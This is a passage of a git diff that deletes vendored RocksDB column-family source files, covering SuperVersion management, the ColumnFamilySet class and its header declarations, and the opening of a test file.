-bool ColumnFamilyData::ReturnThreadLocalSuperVersion(SuperVersion* sv) {
-  assert(sv != nullptr);
-  // Put the SuperVersion back
-  void* expected = SuperVersion::kSVInUse;
-  if (local_sv_->CompareAndSwap(static_cast<void*>(sv), expected)) {
-    // When we see kSVInUse in the ThreadLocal, we are sure ThreadLocal
-    // storage has not been altered and no Scrape has happened. The
-    // SuperVersion is still current.
-    return true;
-  } else {
-    // ThreadLocal scrape happened in the process of this GetImpl call (after
-    // thread local Swap() at the beginning and before CompareAndSwap()).
-    // This means the SuperVersion it holds is obsolete.
-    assert(expected == SuperVersion::kSVObsolete);
-  }
-  return false;
-}
-
-SuperVersion* ColumnFamilyData::InstallSuperVersion(
-    SuperVersion* new_superversion, InstrumentedMutex* db_mutex) {
-  db_mutex->AssertHeld();
-  return InstallSuperVersion(new_superversion, db_mutex, mutable_cf_options_);
-}
-
-SuperVersion* ColumnFamilyData::InstallSuperVersion(
-    SuperVersion* new_superversion, InstrumentedMutex* db_mutex,
-    const MutableCFOptions& mutable_cf_options) {
-  new_superversion->db_mutex = db_mutex;
-  new_superversion->mutable_cf_options = mutable_cf_options;
-  new_superversion->Init(mem_, imm_.current(), current_);
-  SuperVersion* old_superversion = super_version_;
-  super_version_ = new_superversion;
-  ++super_version_number_;
-  super_version_->version_number = super_version_number_;
-  if (old_superversion != nullptr) {
-    if (old_superversion->mutable_cf_options.write_buffer_size !=
-        mutable_cf_options.write_buffer_size) {
-      mem_->UpdateWriteBufferSize(mutable_cf_options.write_buffer_size);
-    }
-  }
-
-  // Reset SuperVersions cached in thread local storage
-  ResetThreadLocalSuperVersions();
-
-  RecalculateWriteStallConditions(mutable_cf_options);
-
-  if (old_superversion != nullptr && old_superversion->Unref()) {
-    old_superversion->Cleanup();
-    return old_superversion;  // will let caller delete outside of mutex
-  }
-  return nullptr;
-}
-
-void ColumnFamilyData::ResetThreadLocalSuperVersions() {
-  autovector<void*> sv_ptrs;
-  local_sv_->Scrape(&sv_ptrs, SuperVersion::kSVObsolete);
-  for (auto ptr : sv_ptrs) {
-    assert(ptr);
-    if (ptr == SuperVersion::kSVInUse) {
-      continue;
-    }
-    auto sv = static_cast<SuperVersion*>(ptr);
-    if (sv->Unref()) {
-      sv->Cleanup();
-      delete sv;
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-Status ColumnFamilyData::SetOptions(
-      const std::unordered_map<std::string, std::string>& options_map) {
-  MutableCFOptions new_mutable_cf_options;
-  Status s = GetMutableOptionsFromStrings(mutable_cf_options_, options_map,
-                                          &new_mutable_cf_options);
-  if (s.ok()) {
-    mutable_cf_options_ = new_mutable_cf_options;
-    mutable_cf_options_.RefreshDerivedOptions(ioptions_);
-  }
-  return s;
-}
-#endif  // ROCKSDB_LITE
-
-ColumnFamilySet::ColumnFamilySet(const std::string& dbname,
-                                 const ImmutableDBOptions* db_options,
-                                 const EnvOptions& env_options,
-                                 Cache* table_cache,
-                                 WriteBufferManager* write_buffer_manager,
-                                 WriteController* write_controller)
-    : max_column_family_(0),
-      dummy_cfd_(new ColumnFamilyData(0, "", nullptr, nullptr, nullptr,
-                                      ColumnFamilyOptions(), *db_options,
-                                      env_options, nullptr)),
-      default_cfd_cache_(nullptr),
-      db_name_(dbname),
-      db_options_(db_options),
-      env_options_(env_options),
-      table_cache_(table_cache),
-      write_buffer_manager_(write_buffer_manager),
-      write_controller_(write_controller) {
-  // initialize linked list
-  dummy_cfd_->prev_ = dummy_cfd_;
-  dummy_cfd_->next_ = dummy_cfd_;
-}
-
-ColumnFamilySet::~ColumnFamilySet() {
-  while (column_family_data_.size() > 0) {
-    // cfd destructor will delete itself from column_family_data_
-    auto cfd = column_family_data_.begin()->second;
-    cfd->Unref();
-    delete cfd;
-  }
-  dummy_cfd_->Unref();
-  delete dummy_cfd_;
-}
-
-ColumnFamilyData* ColumnFamilySet::GetDefault() const {
-  assert(default_cfd_cache_ != nullptr);
-  return default_cfd_cache_;
-}
-
-ColumnFamilyData* ColumnFamilySet::GetColumnFamily(uint32_t id) const {
-  auto cfd_iter = column_family_data_.find(id);
-  if (cfd_iter != column_family_data_.end()) {
-    return cfd_iter->second;
-  } else {
-    return nullptr;
-  }
-}
-
-ColumnFamilyData* ColumnFamilySet::GetColumnFamily(const std::string& name)
-    const {
-  auto cfd_iter = column_families_.find(name);
-  if (cfd_iter != column_families_.end()) {
-    auto cfd = GetColumnFamily(cfd_iter->second);
-    assert(cfd != nullptr);
-    return cfd;
-  } else {
-    return nullptr;
-  }
-}
-
-uint32_t ColumnFamilySet::GetNextColumnFamilyID() {
-  return ++max_column_family_;
-}
-
-uint32_t ColumnFamilySet::GetMaxColumnFamily() { return max_column_family_; }
-
-void ColumnFamilySet::UpdateMaxColumnFamily(uint32_t new_max_column_family) {
-  max_column_family_ = std::max(new_max_column_family, max_column_family_);
-}
-
-size_t ColumnFamilySet::NumberOfColumnFamilies() const {
-  return column_families_.size();
-}
-
-// under a DB mutex AND write thread
-ColumnFamilyData* ColumnFamilySet::CreateColumnFamily(
-    const std::string& name, uint32_t id, Version* dummy_versions,
-    const ColumnFamilyOptions& options) {
-  assert(column_families_.find(name) == column_families_.end());
-  ColumnFamilyData* new_cfd = new ColumnFamilyData(
-      id, name, dummy_versions, table_cache_, write_buffer_manager_, options,
-      *db_options_, env_options_, this);
-  column_families_.insert({name, id});
-  column_family_data_.insert({id, new_cfd});
-  max_column_family_ = std::max(max_column_family_, id);
-  // add to linked list
-  new_cfd->next_ = dummy_cfd_;
-  auto prev = dummy_cfd_->prev_;
-  new_cfd->prev_ = prev;
-  prev->next_ = new_cfd;
-  dummy_cfd_->prev_ = new_cfd;
-  if (id == 0) {
-    default_cfd_cache_ = new_cfd;
-  }
-  return new_cfd;
-}
-
-// REQUIRES: DB mutex held
-void ColumnFamilySet::FreeDeadColumnFamilies() {
-  autovector<ColumnFamilyData*> to_delete;
-  for (auto cfd = dummy_cfd_->next_; cfd != dummy_cfd_; cfd = cfd->next_) {
-    if (cfd->refs_.load(std::memory_order_relaxed) == 0) {
-      to_delete.push_back(cfd);
-    }
-  }
-  for (auto cfd : to_delete) {
-    // this is very rare, so it's not a problem that we do it under a mutex
-    delete cfd;
-  }
-}
-
-// under a DB mutex AND from a write thread
-void ColumnFamilySet::RemoveColumnFamily(ColumnFamilyData* cfd) {
-  auto cfd_iter = column_family_data_.find(cfd->GetID());
-  assert(cfd_iter != column_family_data_.end());
-  column_family_data_.erase(cfd_iter);
-  column_families_.erase(cfd->GetName());
-}
-
-// under a DB mutex OR from a write thread
-bool ColumnFamilyMemTablesImpl::Seek(uint32_t column_family_id) {
-  if (column_family_id == 0) {
-    // optimization for common case
-    current_ = column_family_set_->GetDefault();
-  } else {
-    current_ = column_family_set_->GetColumnFamily(column_family_id);
-  }
-  handle_.SetCFD(current_);
-  return current_ != nullptr;
-}
-
-uint64_t ColumnFamilyMemTablesImpl::GetLogNumber() const {
-  assert(current_ != nullptr);
-  return current_->GetLogNumber();
-}
-
-MemTable* ColumnFamilyMemTablesImpl::GetMemTable() const {
-  assert(current_ != nullptr);
-  return current_->mem();
-}
-
-ColumnFamilyHandle* ColumnFamilyMemTablesImpl::GetColumnFamilyHandle() {
-  assert(current_ != nullptr);
-  return &handle_;
-}
-
-uint32_t GetColumnFamilyID(ColumnFamilyHandle* column_family) {
-  uint32_t column_family_id = 0;
-  if (column_family != nullptr) {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    column_family_id = cfh->GetID();
-  }
-  return column_family_id;
-}
-
-const Comparator* GetColumnFamilyUserComparator(
-    ColumnFamilyHandle* column_family) {
-  if (column_family != nullptr) {
-    return column_family->GetComparator();
-  }
-  return nullptr;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/column_family.h b/thirdparty/rocksdb/db/column_family.h
deleted file mode 100644
index 3a807d2..0000000
--- a/thirdparty/rocksdb/db/column_family.h
+++ /dev/null
@@ -1,577 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <unordered_map>
-#include <string>
-#include <vector>
-#include <atomic>
-
-#include "db/memtable_list.h"
-#include "db/table_cache.h"
-#include "db/table_properties_collector.h"
-#include "db/write_batch_internal.h"
-#include "db/write_controller.h"
-#include "options/cf_options.h"
-#include "rocksdb/compaction_job_stats.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class Version;
-class VersionSet;
-class MemTable;
-class MemTableListVersion;
-class CompactionPicker;
-class Compaction;
-class InternalKey;
-class InternalStats;
-class ColumnFamilyData;
-class DBImpl;
-class LogBuffer;
-class InstrumentedMutex;
-class InstrumentedMutexLock;
-
-extern const double kIncSlowdownRatio;
-
-// ColumnFamilyHandleImpl is the class that clients use to access different
-// column families. It has non-trivial destructor, which gets called when client
-// is done using the column family
-class ColumnFamilyHandleImpl : public ColumnFamilyHandle {
- public:
-  // create while holding the mutex
-  ColumnFamilyHandleImpl(
-      ColumnFamilyData* cfd, DBImpl* db, InstrumentedMutex* mutex);
-  // destroy without mutex
-  virtual ~ColumnFamilyHandleImpl();
-  virtual ColumnFamilyData* cfd() const { return cfd_; }
-
-  virtual uint32_t GetID() const override;
-  virtual const std::string& GetName() const override;
-  virtual Status GetDescriptor(ColumnFamilyDescriptor* desc) override;
-  virtual const Comparator* GetComparator() const override;
-
- private:
-  ColumnFamilyData* cfd_;
-  DBImpl* db_;
-  InstrumentedMutex* mutex_;
-};
-
-// Does not ref-count ColumnFamilyData
-// We use this dummy ColumnFamilyHandleImpl because sometimes MemTableInserter
-// calls DBImpl methods. When this happens, MemTableInserter need access to
-// ColumnFamilyHandle (same as the client would need). In that case, we feed
-// MemTableInserter dummy ColumnFamilyHandle and enable it to call DBImpl
-// methods
-class ColumnFamilyHandleInternal : public ColumnFamilyHandleImpl {
- public:
-  ColumnFamilyHandleInternal()
-      : ColumnFamilyHandleImpl(nullptr, nullptr, nullptr) {}
-
-  void SetCFD(ColumnFamilyData* _cfd) { internal_cfd_ = _cfd; }
-  virtual ColumnFamilyData* cfd() const override { return internal_cfd_; }
-
- private:
-  ColumnFamilyData* internal_cfd_;
-};
-
-// holds references to memtable, all immutable memtables and version
-struct SuperVersion {
-  // Accessing members of this class is not thread-safe and requires external
-  // synchronization (ie db mutex held or on write thread).
-  MemTable* mem;
-  MemTableListVersion* imm;
-  Version* current;
-  MutableCFOptions mutable_cf_options;
-  // Version number of the current SuperVersion
-  uint64_t version_number;
-
-  InstrumentedMutex* db_mutex;
-
-  // should be called outside the mutex
-  SuperVersion() = default;
-  ~SuperVersion();
-  SuperVersion* Ref();
-  // If Unref() returns true, Cleanup() should be called with mutex held
-  // before deleting this SuperVersion.
-  bool Unref();
-
-  // call these two methods with db mutex held
-  // Cleanup unrefs mem, imm and current. Also, it stores all memtables
-  // that needs to be deleted in to_delete vector. Unrefing those
-  // objects needs to be done in the mutex
-  void Cleanup();
-  void Init(MemTable* new_mem, MemTableListVersion* new_imm,
-            Version* new_current);
-
-  // The value of dummy is not actually used. kSVInUse takes its address as a
-  // mark in the thread local storage to indicate the SuperVersion is in use
-  // by thread. This way, the value of kSVInUse is guaranteed to have no
-  // conflict with SuperVersion object address and portable on different
-  // platform.
-  static int dummy;
-  static void* const kSVInUse;
-  static void* const kSVObsolete;
-
- private:
-  std::atomic<uint32_t> refs;
-  // We need to_delete because during Cleanup(), imm->Unref() returns
-  // all memtables that we need to free through this vector. We then
-  // delete all those memtables outside of mutex, during destruction
-  autovector<MemTable*> to_delete;
-};
-
-extern Status CheckCompressionSupported(const ColumnFamilyOptions& cf_options);
-
-extern Status CheckConcurrentWritesSupported(
-    const ColumnFamilyOptions& cf_options);
-
-extern ColumnFamilyOptions SanitizeOptions(const ImmutableDBOptions& db_options,
-                                           const ColumnFamilyOptions& src);
-// Wrap user defined table proproties collector factories `from cf_options`
-// into internal ones in int_tbl_prop_collector_factories. Add a system internal
-// one too.
-extern void GetIntTblPropCollectorFactory(
-    const ImmutableCFOptions& ioptions,
-    std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories);
-
-class ColumnFamilySet;
-
-// This class keeps all the data that a column family needs.
-// Most methods require DB mutex held, unless otherwise noted
-class ColumnFamilyData {
- public:
-  ~ColumnFamilyData();
-
-  // thread-safe
-  uint32_t GetID() const { return id_; }
-  // thread-safe
-  const std::string& GetName() const { return name_; }
-
-  // Ref() can only be called from a context where the caller can guarantee
-  // that ColumnFamilyData is alive (while holding a non-zero ref already,
-  // holding a DB mutex, or as the leader in a write batch group).
-  void Ref() { refs_.fetch_add(1, std::memory_order_relaxed); }
-
-  // Unref decreases the reference count, but does not handle deletion
-  // when the count goes to 0.  If this method returns true then the
-  // caller should delete the instance immediately, or later, by calling
-  // FreeDeadColumnFamilies().  Unref() can only be called while holding
-  // a DB mutex, or during single-threaded recovery.
-  bool Unref() {
-    int old_refs = refs_.fetch_sub(1, std::memory_order_relaxed);
-    assert(old_refs > 0);
-    return old_refs == 1;
-  }
-
-  // SetDropped() can only be called under following conditions:
-  // 1) Holding a DB mutex,
-  // 2) from single-threaded write thread, AND
-  // 3) from single-threaded VersionSet::LogAndApply()
-  // After dropping column family no other operation on that column family
-  // will be executed. All the files and memory will be, however, kept around
-  // until client drops the column family handle. That way, client can still
-  // access data from dropped column family.
-  // Column family can be dropped and still alive. In that state:
-  // *) Compaction and flush is not executed on the dropped column family.
-  // *) Client can continue reading from column family. Writes will fail unless
-  // WriteOptions::ignore_missing_column_families is true
-  // When the dropped column family is unreferenced, then we:
-  // *) Remove column family from the linked list maintained by ColumnFamilySet
-  // *) delete all memory associated with that column family
-  // *) delete all the files associated with that column family
-  void SetDropped();
-  bool IsDropped() const { return dropped_; }
-
-  // thread-safe
-  int NumberLevels() const { return ioptions_.num_levels; }
-
-  void SetLogNumber(uint64_t log_number) { log_number_ = log_number; }
-  uint64_t GetLogNumber() const { return log_number_; }
-
-  // thread-safe
-  const EnvOptions* soptions() const;
-  const ImmutableCFOptions* ioptions() const { return &ioptions_; }
-  // REQUIRES: DB mutex held
-  // This returns the MutableCFOptions used by current SuperVersion
-  // You should use this API to reference MutableCFOptions most of the time.
-  const MutableCFOptions* GetCurrentMutableCFOptions() const {
-    return &(super_version_->mutable_cf_options);
-  }
-  // REQUIRES: DB mutex held
-  // This returns the latest MutableCFOptions, which may be not in effect yet.
-  const MutableCFOptions* GetLatestMutableCFOptions() const {
-    return &mutable_cf_options_;
-  }
-
-  // REQUIRES: DB mutex held
-  // Build ColumnFamiliesOptions with immutable options and latest mutable
-  // options.
-  ColumnFamilyOptions GetLatestCFOptions() const;
-
-  bool is_delete_range_supported() { return is_delete_range_supported_; }
-
-#ifndef ROCKSDB_LITE
-  // REQUIRES: DB mutex held
-  Status SetOptions(
-      const std::unordered_map<std::string, std::string>& options_map);
-#endif  // ROCKSDB_LITE
-
-  InternalStats* internal_stats() { return internal_stats_.get(); }
-
-  MemTableList* imm() { return &imm_; }
-  MemTable* mem() { return mem_; }
-  Version* current() { return current_; }
-  Version* dummy_versions() { return dummy_versions_; }
-  void SetCurrent(Version* _current);
-  uint64_t GetNumLiveVersions() const;  // REQUIRE: DB mutex held
-  uint64_t GetTotalSstFilesSize() const;  // REQUIRE: DB mutex held
-  void SetMemtable(MemTable* new_mem) { mem_ = new_mem; }
-
-  // calculate the oldest log needed for the durability of this column family
-  uint64_t OldestLogToKeep();
-
-  // See Memtable constructor for explanation of earliest_seq param.
-  MemTable* ConstructNewMemtable(const MutableCFOptions& mutable_cf_options,
-                                 SequenceNumber earliest_seq);
-  void CreateNewMemtable(const MutableCFOptions& mutable_cf_options,
-                         SequenceNumber earliest_seq);
-
-  TableCache* table_cache() const { return table_cache_.get(); }
-
-  // See documentation in compaction_picker.h
-  // REQUIRES: DB mutex held
-  bool NeedsCompaction() const;
-  // REQUIRES: DB mutex held
-  Compaction* PickCompaction(const MutableCFOptions& mutable_options,
-                             LogBuffer* log_buffer);
-
-  // Check if the passed range overlap with any running compactions.
-  // REQUIRES: DB mutex held
-  bool RangeOverlapWithCompaction(const Slice& smallest_user_key,
-                                  const Slice& largest_user_key,
-                                  int level) const;
-
-  // A flag to tell a manual compaction is to compact all levels together
-  // instad of for specific level.
-  static const int kCompactAllLevels;
-  // A flag to tell a manual compaction's output is base level.
-  static const int kCompactToBaseLevel;
-  // REQUIRES: DB mutex held
-  Compaction* CompactRange(const MutableCFOptions& mutable_cf_options,
-                           int input_level, int output_level,
-                           uint32_t output_path_id, const InternalKey* begin,
-                           const InternalKey* end, InternalKey** compaction_end,
-                           bool* manual_conflict);
-
-  CompactionPicker* compaction_picker() { return compaction_picker_.get(); }
-  // thread-safe
-  const Comparator* user_comparator() const {
-    return internal_comparator_.user_comparator();
-  }
-  // thread-safe
-  const InternalKeyComparator& internal_comparator() const {
-    return internal_comparator_;
-  }
-
-  const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-  int_tbl_prop_collector_factories() const {
-    return &int_tbl_prop_collector_factories_;
-  }
-
-  SuperVersion* GetSuperVersion() { return super_version_; }
-  // thread-safe
-  // Return a already referenced SuperVersion to be used safely.
-  SuperVersion* GetReferencedSuperVersion(InstrumentedMutex* db_mutex);
-  // thread-safe
-  // Get SuperVersion stored in thread local storage. If it does not exist,
-  // get a reference from a current SuperVersion.
-  SuperVersion* GetThreadLocalSuperVersion(InstrumentedMutex* db_mutex);
-  // Try to return SuperVersion back to thread local storage. Retrun true on
-  // success and false on failure. It fails when the thread local storage
-  // contains anything other than SuperVersion::kSVInUse flag.
-  bool ReturnThreadLocalSuperVersion(SuperVersion* sv);
-  // thread-safe
-  uint64_t GetSuperVersionNumber() const {
-    return super_version_number_.load();
-  }
-  // will return a pointer to SuperVersion* if previous SuperVersion
-  // if its reference count is zero and needs deletion or nullptr if not
-  // As argument takes a pointer to allocated SuperVersion to enable
-  // the clients to allocate SuperVersion outside of mutex.
-  // IMPORTANT: Only call this from DBImpl::InstallSuperVersion()
-  SuperVersion* InstallSuperVersion(SuperVersion* new_superversion,
-                                    InstrumentedMutex* db_mutex,
-                                    const MutableCFOptions& mutable_cf_options);
-  SuperVersion* InstallSuperVersion(SuperVersion* new_superversion,
-                                    InstrumentedMutex* db_mutex);
-
-  void ResetThreadLocalSuperVersions();
-
-  // Protected by DB mutex
-  void set_pending_flush(bool value) { pending_flush_ = value; }
-  void set_pending_compaction(bool value) { pending_compaction_ = value; }
-  bool pending_flush() { return pending_flush_; }
-  bool pending_compaction() { return pending_compaction_; }
-
-  // Recalculate some small conditions, which are changed only during
-  // compaction, adding new memtable and/or
-  // recalculation of compaction score. These values are used in
-  // DBImpl::MakeRoomForWrite function to decide, if it need to make
-  // a write stall
-  void RecalculateWriteStallConditions(
-      const MutableCFOptions& mutable_cf_options);
-
-  void set_initialized() { initialized_.store(true); }
-
-  bool initialized() const { return initialized_.load(); }
-
- private:
-  friend class ColumnFamilySet;
-  ColumnFamilyData(uint32_t id, const std::string& name,
-                   Version* dummy_versions, Cache* table_cache,
-                   WriteBufferManager* write_buffer_manager,
-                   const ColumnFamilyOptions& options,
-                   const ImmutableDBOptions& db_options,
-                   const EnvOptions& env_options,
-                   ColumnFamilySet* column_family_set);
-
-  uint32_t id_;
-  const std::string name_;
-  Version* dummy_versions_;  // Head of circular doubly-linked list of versions.
-  Version* current_;         // == dummy_versions->prev_
-
-  std::atomic<int> refs_;      // outstanding references to ColumnFamilyData
-  std::atomic<bool> initialized_;
-  bool dropped_;               // true if client dropped it
-
-  const InternalKeyComparator internal_comparator_;
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories_;
-
-  const ColumnFamilyOptions initial_cf_options_;
-  const ImmutableCFOptions ioptions_;
-  MutableCFOptions mutable_cf_options_;
-
-  const bool is_delete_range_supported_;
-
-  std::unique_ptr<TableCache> table_cache_;
-
-  std::unique_ptr<InternalStats> internal_stats_;
-
-  WriteBufferManager* write_buffer_manager_;
-
-  MemTable* mem_;
-  MemTableList imm_;
-  SuperVersion* super_version_;
-
-  // An ordinal representing the current SuperVersion. Updated by
-  // InstallSuperVersion(), i.e. incremented every time super_version_
-  // changes.
-  std::atomic<uint64_t> super_version_number_;
-
-  // Thread's local copy of SuperVersion pointer
-  // This needs to be destructed before mutex_
-  std::unique_ptr<ThreadLocalPtr> local_sv_;
-
-  // pointers for a circular linked list. we use it to support iterations over
-  // all column families that are alive (note: dropped column families can also
-  // be alive as long as client holds a reference)
-  ColumnFamilyData* next_;
-  ColumnFamilyData* prev_;
-
-  // This is the earliest log file number that contains data from this
-  // Column Family. All earlier log files must be ignored and not
-  // recovered from
-  uint64_t log_number_;
-
-  // An object that keeps all the compaction stats
-  // and picks the next compaction
-  std::unique_ptr<CompactionPicker> compaction_picker_;
-
-  ColumnFamilySet* column_family_set_;
-
-  std::unique_ptr<WriteControllerToken> write_controller_token_;
-
-  // If true --> this ColumnFamily is currently present in DBImpl::flush_queue_
-  bool pending_flush_;
-
-  // If true --> this ColumnFamily is currently present in
-  // DBImpl::compaction_queue_
-  bool pending_compaction_;
-
-  uint64_t prev_compaction_needed_bytes_;
-
-  // if the database was opened with 2pc enabled
-  bool allow_2pc_;
-};
-
-// ColumnFamilySet has interesting thread-safety requirements
-// * CreateColumnFamily() or RemoveColumnFamily() -- need to be protected by DB
-// mutex AND executed in the write thread.
-// CreateColumnFamily() should ONLY be called from VersionSet::LogAndApply() AND
-// single-threaded write thread. It is also called during Recovery and in
-// DumpManifest().
-// RemoveColumnFamily() is only called from SetDropped(). DB mutex needs to be
-// held and it needs to be executed from the write thread. SetDropped() also
-// guarantees that it will be called only from single-threaded LogAndApply(),
-// but this condition is not that important.
-// * Iteration -- hold DB mutex, but you can release it in the body of
-// iteration. If you release DB mutex in body, reference the column
-// family before the mutex and unreference after you unlock, since the column
-// family might get dropped when the DB mutex is released
-// * GetDefault() -- thread safe
-// * GetColumnFamily() -- either inside of DB mutex or from a write thread
-// * GetNextColumnFamilyID(), GetMaxColumnFamily(), UpdateMaxColumnFamily(),
-// NumberOfColumnFamilies -- inside of DB mutex
-class ColumnFamilySet {
- public:
-  // ColumnFamilySet supports iteration
-  class iterator {
-   public:
-    explicit iterator(ColumnFamilyData* cfd)
-        : current_(cfd) {}
-    iterator& operator++() {
-      // dropped column families might still be included in this iteration
-      // (we're only removing them when client drops the last reference to the
-      // column family).
-      // dummy is never dead, so this will never be infinite
-      do {
-        current_ = current_->next_;
-      } while (current_->refs_.load(std::memory_order_relaxed) == 0);
-      return *this;
-    }
-    bool operator!=(const iterator& other) {
-      return this->current_ != other.current_;
-    }
-    ColumnFamilyData* operator*() { return current_; }
-
-   private:
-    ColumnFamilyData* current_;
-  };
-
-  ColumnFamilySet(const std::string& dbname,
-                  const ImmutableDBOptions* db_options,
-                  const EnvOptions& env_options, Cache* table_cache,
-                  WriteBufferManager* write_buffer_manager,
-                  WriteController* write_controller);
-  ~ColumnFamilySet();
-
-  ColumnFamilyData* GetDefault() const;
-  // GetColumnFamily() calls return nullptr if column family is not found
-  ColumnFamilyData* GetColumnFamily(uint32_t id) const;
-  ColumnFamilyData* GetColumnFamily(const std::string& name) const;
-  // this call will return the next available column family ID. it guarantees
-  // that there is no column family with id greater than or equal to the
-  // returned value in the current running instance or anytime in RocksDB
-  // instance history.
-  uint32_t GetNextColumnFamilyID();
-  uint32_t GetMaxColumnFamily();
-  void UpdateMaxColumnFamily(uint32_t new_max_column_family);
-  size_t NumberOfColumnFamilies() const;
-
-  ColumnFamilyData* CreateColumnFamily(const std::string& name, uint32_t id,
-                                       Version* dummy_version,
-                                       const ColumnFamilyOptions& options);
-
-  iterator begin() { return iterator(dummy_cfd_->next_); }
-  iterator end() { return iterator(dummy_cfd_); }
-
-  // REQUIRES: DB mutex held
-  // Don't call while iterating over ColumnFamilySet
-  void FreeDeadColumnFamilies();
-
-  Cache* get_table_cache() { return table_cache_; }
-
- private:
-  friend class ColumnFamilyData;
-  // helper function that gets called from cfd destructor
-  // REQUIRES: DB mutex held
-  void RemoveColumnFamily(ColumnFamilyData* cfd);
-
-  // column_families_ and column_family_data_ need to be protected:
-  // * when mutating both conditions have to be satisfied:
-  // 1. DB mutex locked
-  // 2. thread currently in single-threaded write thread
-  // * when reading, at least one condition needs to be satisfied:
-  // 1. DB mutex locked
-  // 2. accessed from a single-threaded write thread
-  std::unordered_map<std::string, uint32_t> column_families_;
-  std::unordered_map<uint32_t, ColumnFamilyData*> column_family_data_;
-
-  uint32_t max_column_family_;
-  ColumnFamilyData* dummy_cfd_;
-  // We don't hold the refcount here, since default column family always exists
-  // We are also not responsible for cleaning up default_cfd_cache_. This is
-  // just a cache that makes common case (accessing default column family)
-  // faster
-  ColumnFamilyData* default_cfd_cache_;
-
-  const std::string db_name_;
-  const ImmutableDBOptions* const db_options_;
-  const EnvOptions env_options_;
-  Cache* table_cache_;
-  WriteBufferManager* write_buffer_manager_;
-  WriteController* write_controller_;
-};
-
-// We use ColumnFamilyMemTablesImpl to provide WriteBatch a way to access
-// memtables of different column families (specified by ID in the write batch)
-class ColumnFamilyMemTablesImpl : public ColumnFamilyMemTables {
- public:
-  explicit ColumnFamilyMemTablesImpl(ColumnFamilySet* column_family_set)
-      : column_family_set_(column_family_set), current_(nullptr) {}
-
-  // Constructs a ColumnFamilyMemTablesImpl equivalent to one constructed
-  // with the arguments used to construct *orig.
-  explicit ColumnFamilyMemTablesImpl(ColumnFamilyMemTablesImpl* orig)
-      : column_family_set_(orig->column_family_set_), current_(nullptr) {}
-
-  // sets current_ to ColumnFamilyData with column_family_id
-  // returns false if column family doesn't exist
-  // REQUIRES: use this function of DBImpl::column_family_memtables_ should be
-  //           under a DB mutex OR from a write thread
-  bool Seek(uint32_t column_family_id) override;
-
-  // Returns log number of the selected column family
-  // REQUIRES: under a DB mutex OR from a write thread
-  uint64_t GetLogNumber() const override;
-
-  // REQUIRES: Seek() called first
-  // REQUIRES: use this function of DBImpl::column_family_memtables_ should be
-  //           under a DB mutex OR from a write thread
-  virtual MemTable* GetMemTable() const override;
-
-  // Returns column family handle for the selected column family
-  // REQUIRES: use this function of DBImpl::column_family_memtables_ should be
-  //           under a DB mutex OR from a write thread
-  virtual ColumnFamilyHandle* GetColumnFamilyHandle() override;
-
-  // Cannot be called while another thread is calling Seek().
-  // REQUIRES: use this function of DBImpl::column_family_memtables_ should be
-  //           under a DB mutex OR from a write thread
-  virtual ColumnFamilyData* current() override { return current_; }
-
- private:
-  ColumnFamilySet* column_family_set_;
-  ColumnFamilyData* current_;
-  ColumnFamilyHandleInternal handle_;
-};
-
-extern uint32_t GetColumnFamilyID(ColumnFamilyHandle* column_family);
-
-extern const Comparator* GetColumnFamilyUserComparator(
-    ColumnFamilyHandle* column_family);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/column_family_test.cc b/thirdparty/rocksdb/db/column_family_test.cc
deleted file mode 100644
index 88786d4..0000000
--- a/thirdparty/rocksdb/db/column_family_test.cc
+++ /dev/null
@@ -1,3244 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <algorithm>
-#include <vector>
-#include <string>
-#include <thread>
-
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "options/options_parser.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "util/coding.h"
-#include "util/fault_injection_test_env.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-static const int kValueSize = 1000;
-
-namespace {
-std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-}  // anonymous namespace
-
-// counts how many operations were performed
-class EnvCounter : public EnvWrapper {
- public:
-  explicit EnvCounter(Env* base)
-      : EnvWrapper(base), num_new_writable_file_(0) {}
-  int GetNumberOfNewWritableFileCalls() {
-    return num_new_writable_file_;
-  }
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& soptions) override {
-    ++num_new_writable_file_;
-    return EnvWrapper::NewWritableFile(f, r, soptions);
-  }
-
- private:
-  std::atomic<int> num_new_writable_file_;
-};
-
-class ColumnFamilyTest : public testing::Test {
- public:
-  ColumnFamilyTest() : rnd_(139) {
-    env_ = new EnvCounter(Env::Default());
-    dbname_ = test::TmpDir() + "/column_family_test";
-    db_options_.create_if_missing = true;
-    db_options_.fail_if_options_file_error = true;
-    db_options_.env = env_;
-    DestroyDB(dbname_, Options(db_options_, column_family_options_));
-  }
-
-  ~ColumnFamilyTest() {
-    Close();
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    Destroy();
-    delete env_;
-  }
-
-  // Return the value to associate with the specified key
-  Slice Value(int k, std::string* storage) {
-    if (k == 0) {
